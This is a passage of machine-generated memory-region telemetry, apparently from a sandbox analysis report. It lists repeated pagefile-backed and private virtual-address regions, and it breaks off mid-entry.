Region: id = 10081 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10082 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10086 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10087 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10088 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10089 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10090 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10091 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10092 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10093 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10094 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10095 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10096 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10097 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10098 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10099 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10100 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10101 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10102 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10103 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10104 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10105 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10106 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10107 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10108 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10109 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10110 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10111 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10112 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10113 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10114 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10115 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10116 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10117 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10118 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10119 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10120 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10121 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10122 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10123 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10124 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10125 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10126 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10127 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10128 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10129 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10130 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10131 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10132 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10133 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10134 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10135 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10136 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10137 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10138 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10139 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10140 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10141 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10142 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10143 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10144 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10145 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10146 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10147 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10148 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10149 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10150 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10151 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10152 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10153 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10154 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10155 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10156 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10157 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10158 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10159 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10160 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10161 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10162 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10163 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10164 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10165 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10166 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10167 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10168 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10169 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10170 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10171 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10172 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10173 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10174 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10175 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10176 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10177 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10178 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10179 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10180 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10181 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10182 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10183 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10184 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10185 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10187 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10188 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10193 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10194 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10195 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10196 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10197 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10198 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10199 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10200 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10201 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10202 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10204 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10205 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10206 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10219 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10220 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10221 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10222 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10223 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10224 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10225 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10226 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10227 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10228 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10229 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10230 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10231 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10232 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10233 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10234 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10235 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10236 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10237 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10238 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10239 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10240 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10241 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10242 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10243 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10246 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10247 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10248 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10249 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10250 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10251 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10253 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10254 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10255 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10256 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10258 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10259 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10260 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10264 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10265 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10266 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10267 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10268 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = 